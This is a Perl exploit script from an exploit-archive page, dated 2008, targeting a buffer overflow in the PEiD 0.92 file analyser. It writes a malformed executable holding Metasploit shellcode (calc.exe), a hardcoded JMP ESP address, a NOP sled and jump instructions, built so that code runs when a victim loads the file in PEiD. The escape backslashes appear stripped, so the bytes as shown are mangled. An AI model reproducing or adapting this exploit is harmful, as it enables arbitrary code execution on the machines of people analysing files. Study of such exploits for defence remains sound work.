PEiD <= 0.92 Malformed PE File Universal Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PEiD <= 0.92 Malformed PE File Universal Buffer Overflow Exploit
# Published : 2008-12-05
# Author : SkD
# Previous Title : PHP safe_mode bypass via proc_open() and custom environment
# Next Title : Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit
#!/usr/bin/perl
# 
# PEiD <= 0.92 Buffer Overflow Universal Exploit
# Exploit by SkD (skdrat@hotmail.com)
# ----------------------------------------------
# An old vulnerability but no existing exploit 
# for it, so here it is. Of course, I had to make it
# universal because of that.This exploit will work
# on all OS versions (XP, Vista, 2003, 2000).
# You have limited space for the shellcode 
# (around 500, it can be tweaked for more space)
# and there are no character restrictions.
#
# You can download PEiD 0.92 here:
# http://www.absolutelock.de/construction/files/releases/PEiD.zip
#
# To trigger the exploit, load the created executable and then
# click the "First Bytes" arrow. 
# Check it out :).
#
# Note:
# Author has no responsibility over the damage you do with this.

use strict; use warnings;

# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x19".
"xc5xd8x59x83xebxfcxe2xf4xe5x2dx9cx59x19xc5x53x1c".
"x25x4exa4x5cx61xc4x37xd2x56xddx53x06x39xc4x33x10".
"x92xf1x53x58xf7xf4x18xc0xb5x41x18x2dx1ex04x12x54".
"x18x07x33xadx22x91xfcx5dx6cx20x53x06x3dxc4x33x3f".
"x92xc9x93xd2x46xd9xd9xb2x92xd9x53x58xf2x4cx84x7d".
"x1dx06xe9x99x7dx4ex98x69x9cx05xa0x55x92x85xd4xd2".
"x69xd9x75xd2x71xcdx33x50x92x45x68x59x19xc5x53x31".
"x25x9axe9xafx79x93x51xa1x9ax05xa3x09x71x35x52x5d".
"x46xadx40xa7x93xcbx8fxa6xfexa6xb9x35x7axebxbdx21".
"x7cxc5xd8x59";
my $exe_part1 = 
"x4Dx5Ax90x00x03x00x00x00x04x00x00x00xFFxFFx00x00xB8x00x00x00x00x00x00x00x40x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xC8x00x00x00".
"x0Ex1FxBAx0Ex00xB4x09xCDx21xB8x01x4CxCDx21x54x68x69x73x20x70x72x6Fx67x72x61x6Dx20x63x61x6Ex6Ex6F".
"x74x20x62x65x20x72x75x6Ex20x69x6Ex20x44x4Fx53x20x6Dx6Fx64x65x2Ex0Dx0Dx0Ax24x00x00x00x00x00x00x00".
"xA5x8Ax2DxC7xE1xEBx43x94xE1xEBx43x94xE1xEBx43x94xBExC9x48x94xE4xEBx43x94xE1xEBx42x94xEAxEBx43x94".
"x83xF4x50x94xE4xEBx43x94x09xF4x48x94xE3xEBx43x94x52x69x63x68xE1xEBx43x94x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x50x45x00x00x4Cx01x03x00x86xE1x38x49x00x00x00x00x00x00x00x00xE0x00x0Fx01".
"x0Bx01x06x00x00x02x00x00x00x06x00x00x00x00x00x00x72x10x00x00x00x10x00x00x00x20x00x00x00x00x40x00".
"x00x10x00x00x00x02x00x00x04x00x00x00x00x00x00x00x04x00x00x00x00x00x00x00x00x40x00x00x00x04x00x00".
"x00x00x00x00x03x00x00x00x00x00x10x00x00x10x00x00x00x00x10x00x00x10x00x00x00x00x00x00x10x00x00x00".
"x00x00x00x00x00x00x00x00x30x20x00x00x3Cx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x20x00x00x30x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x2Ex74x65x78x74x00x00x00xFCx01x00x00x00x10x00x00x00x02x00x00x00x04x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x20x00x00x60x2Ex72x64x61x74x61x00x00x44x01x00x00x00x20x00x00x00x02x00x00x00x06x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x40x00x00x40x2Ex64x61x74x61x00x00x00x3Cx02x00x00x00x30x00x00".
"x00x02x00x00x00x08x00x00x00x00x00x00x00x00x00x00x00x00x00x00x40x00x00xC0x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x6Ax00x68x28x30x40x00x68x18x30x40x00x6Ax00xFFx15x24x20x40x00x68x08x30x40x00xE8x12x00x00x00x83xC4".
"x04x33xC0xC3x90x90x90x90x90x90x90x90x90x90x90x90x55x8BxECx81xECx04x04x00x00x8Dx45x0Cx56x50x8Dx85".
"xFCxFBxFFxFFxFFx75x08x50xFFx15x28x20x40x00x8BxF0x8Dx45xFCx6Ax00x50x8Dx85xFCxFBxFFxFFx56x50x6AxF5".
"xFFx15x08x20x40x00x50xFFx15x04x20x40x00x8BxC6x5ExC9xC3x56xE8x83x00x00x00x8BxF0xE8x48x00x00x00x68".
"x04x30x40x00x68x00x30x40x00xE8x1Fx00x00x00x6Ax00x68x38x30x40x00x56xE8x65xFFxFFxFFx83xC4x14x8BxF0".
"xE8x3Ax00x00x00x56xFFx15x0Cx20x40x00x5Ex56x8Bx74x24x08x3Bx74x24x0Cx73x0Dx8Bx06x85xC0x74x02xFFxD0".
"x83xC6x04xEBxEDx5ExC3x6Ax20x58x6Ax04x50xA3x30x30x40x00xE8x0Bx01x00x00x59xA3x2Cx30x40x00x59xC3x8B".
"x0Dx34x30x40x00x85xC9x74x11xA1x2Cx30x40x00x8Dx0Cx88x51x50xE8xB5xFFxFFxFFx59x59xC3x53x56x33xDBx57".
"x89x1Dx38x30x40x00xFFx15x1Cx20x40x00x8BxF8x57xFFx15x18x20x40x00x40x50x53xFFx15x14x20x40x00x50xFF".
"x15x00x20x40x00x8BxF0x3BxF3x75x07x33xC0xE9xACx00x00x00x57x56xFFx15x10x20x40x00x80x3Ex22x75x1Ax46".
"x89x35x38x30x40x00x8Ax06x3AxC3x74x07x3Cx22x74x03x46xEBxF3x38x1Ex75x1DxEBxD2x89x35x38x30x40x00x8A".
"x06x3AxC3x74x0Bx3Cx20x74x07x3Cx09x74x03x46xEBxEFx38x1Ex74x03x88x1Ex46x6Ax01xB9x3Cx30x40x00x58x8A".
"x16x3AxD3x74x05x80xFAx20x74x05x80xFAx09x75x03x46xEBxEDx8Ax16x3AxD3x74x46x80xFAx22x75x17x46x40x89".
"x31x83xC1x04x89x19x8Ax16x3AxD3x74x23x80xFAx22x74x1Ex46xEBxF2x89x31x40x83xC1x04x89x19x8Ax16x3AxD3".
"x74x0Dx80xFAx20x74x08x80xFAx09x74x03x46xEBxEDx38x1Ex74x0Bx88x1Ex46x81xF9x38x32x40x00x7CxA1x5Fx5E".
"x5BxC3x8Bx44x24x04x0FxAFx44x24x08x50x6Ax08xFFx15x14x20x40x00x50xFFx15x00x20x40x00xC3x00x00x00x00".
"xECx20x00x00xB6x20x00x00xC2x20x00x00xD2x20x00x00xE0x20x00x00xF8x20x00x00x0Ax21x00x00x16x21x00x00".
"x00x00x00x00x9Cx20x00x00x36x21x00x00x00x00x00x00x90x20x00x00x00x00x00x00x00x00x00x00xAAx20x00x00".
"x24x20x00x00x6Cx20x00x00x00x00x00x00x00x00x00x00x28x21x00x00x00x20x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00xECx20x00x00xB6x20x00x00xC2x20x00x00xD2x20x00x00xE0x20x00x00".
"xF8x20x00x00x0Ax21x00x00x16x21x00x00x00x00x00x00x9Cx20x00x00x36x21x00x00x00x00x00x00xBEx01x4Dx65".
"x73x73x61x67x65x42x6Fx78x41";
my $exe_part2 = 
"x00x55x53x45x52x33x32x2Ex64x6Cx6Cx00x00xDFx02x57x72x69x74x65x46x69x6Cx65x00x52x01x47x65x74x53x74".
"x64x48x61x6Ex64x6Cx65x00x00x7Dx00x45x78x69x74x50x72x6Fx63x65x73x73x00x02x03x6Cx73x74x72x63x70x79".
"x41x00x00x99x01x48x65x61x70x41x6Cx6Cx6Fx63x00x40x01x47x65x74x50x72x6Fx63x65x73x73x48x65x61x70x00".
"x00x08x03x6Cx73x74x72x6Cx65x6Ex41x00x00xCAx00x47x65x74x43x6Fx6Dx6Dx61x6Ex64x4Cx69x6Ex65x41x00x4B".
"x45x52x4Ex45x4Cx33x32x2Ex64x6Cx6Cx00x00xAEx02x77x76x73x70x72x69x6Ex74x66x41x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x48".
"x65x6Cx6Cx6Fx20x57x6Fx72x6Cx64x21x0Ax00x00x00x48x65x6Cx6Cx6Fx20x57x6Fx72x6Cx64x21x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00";
my $len = 564 - (length($shellcode) + 100);
my $overflow1 = "x41" x 100;
my $overflow2 = "x41" x $len;
my $overflow3 = "x90" x 3;
my $eip = "xa2x33x46x00";#00463379   > FFE4           JMP ESP or 004633A2   . FFE4           JMP ESP
my $long_jmp = "xe9x0bxfexffxff";
my $nopsled = "x90" x 20;

open(my $exe, "> s.eXe");
binmode $exe;
print $exe $exe_part1.$overflow1.$shellcode.$overflow2.$long_jmp.$overflow3.$eip.$long_jmp.$nopsled.$shellcode.$overflow2.$exe_part2;
close($exe);

# www.Syue.com [2008-12-05]